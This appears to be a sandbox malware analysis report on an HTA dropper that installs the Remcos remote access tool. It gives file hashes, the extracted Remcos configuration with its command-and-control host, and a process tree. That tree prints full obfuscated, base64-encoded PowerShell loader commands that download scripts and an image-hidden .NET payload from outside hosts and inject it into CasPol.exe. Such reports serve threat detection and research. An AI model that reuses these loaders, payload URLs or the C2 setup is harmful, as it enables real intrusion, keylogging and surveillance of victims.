Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
17-12-2024 06:21
General
-
Target
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
-
Size
144KB
-
MD5
80636733be5c6936770df78c2298d639
-
SHA1
0e9cd08975bff8b04e8e7671f13c2585c25796a5
-
SHA256
9c4e6335372584e7b1e145fe9ac1eeb43c148ac9b98337a4629b817badc83eec
-
SHA512
6518d2d47c9f724e9beeae9440ac82d379d51e8bd81970fe37b933f07e2ebe7e280c91c30202cf4c57776551ff2524d78bceb486a74a100472838d96500fa1a7
-
SSDEEP
768:t1EuT0um2oum2uD5KUJDVUKhCTGVf/ACBzg2lw1/lEwUUKBqe/zg7szgmUM/ONvT:tF
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Extracted
remcos
RemoteHost
kiolokgangan.duckdns.org:2430
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-H22KKM
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
-
Evasion via Device Credential Deployment 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yxeim1zp\yxeim1zp.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC38E.tmp" "c:\Users\Admin\AppData\Local\Temp\yxeim1zp\CSC939349047A8F411DAD14D8DF95CC2FAC.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD5a65f42673fa9a3125b885fc423f9969a
SHA1f568f3d3ea1b98d677155ad221fe59fa64a0a472
SHA256c7d92f119c05d9a82f32e017360ee827aa04b4eba218964ad0ce129f83403b9f
SHA512840bfda842dc06779ed509990fd856e4ca74dbe68a3705adafe0d7a60a7dcfceb2fab5b26cbdbaa0338e59aca27cfda2bf80bdf145372665ad354ba0361b392b
-
Filesize
1KB
MD5238239047a28f2b5dc10c11c6030ae27
SHA112dc52a5069708a91b7299a44a719a635fc4da88
SHA256700233173e177ae309f90370f004020cc27d20a07a469057addfa49fbbc60321
SHA51236ec8391c370b748ea83283967cdfa3c290009762565bc95dee091a9012eb5f73ae87bf507139aa753930ead8f09486f74bd7f5006b857642772d740c562f3de
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD529826f7495293fd918666cfaca6f7e00
SHA11458bf6cfd4c3dad4b58df13f874009c6247c712
SHA2566a6bb9b4abde44984133c29ab1c3e068f76ee8aa030864da9d4dc5c3be583f1d
SHA5127b90df890b4dedbf5ae16d90d3f0882c4795766622c26ccdcfbc9320c4186839d8e2f708a4748239169b57f222256c204e74191966f09ec044b9c5f304bbf63f
-
Filesize
150KB
MD580c468cccbc1d6aa31d066f64ce06b42
SHA16276da318e9ec1756dda7d7c9e9b2c5f00d3fda4
SHA25679a186bd409caf82e85361c6885fd71ee00bea6968d85cb8c9b71535909fe411
SHA51237fd56e6121926e15433636afe449f7002de7a5be35c18f8855d2e24c3542eabd7533b2ddb363e49972ddca03f3edb5868bb944ac799ff2fcf245d6271bf6662
-
Filesize
652B
MD55e49207ba78767f0beac814487a7cf93
SHA1bcbdc3d8c674123e852c209d1a0f7ddf3a26bd86
SHA256c4dd92110b57fa4d6ea0315723a9f70897cc97a36aad5c13715dde0885ed571b
SHA512c46c74406b295f82ce0d02e06aeb6723c301c48800ecf75376645e23093d9948e7b93feea56768a20bcb5e3cd2a1bc1353a334084573b4b22a8060678bea67bf
-
Filesize
485B
MD5c0ab7d9c1b9063dc8a229d9074412ec6
SHA14822b8b99901c563e7b2eb0399aab1ada29809d1
SHA25605da06f5d5afbb950c215d14a1ae166c256466f43298bf300ddffe6cf87d6ef6
SHA5123d09208b03cbbca2f036d4c7caf06990af60c40fd3727f59489c454e7d8d02a6f0ed1448040f224a093695dd143836044d5afdd8543c921a2f543246da57b4bf
-
Filesize
369B
MD5912a02590a27296c5ce86c5302f35323
SHA1cbeabb3ed1859b142acc9a95bb2eddd28467eba3
SHA256e37e98b1c41bd5b489b0eaa87049223a6483abb8cd82400bee6eafb7a9852145
SHA51299268c01a355db776ae4c02c978a8b7619da543ae5ee8c6eda1446bcffb387ecba91d691c0e05bbe2f9275e9324025202dd4231e71e16149c2c5ca2810aa5872
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
624KB
-
Filesize
1.5MB
-
Filesize
3.3MB
-
Filesize
4KB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
68KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
6.5MB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
200KB
-
Filesize
304KB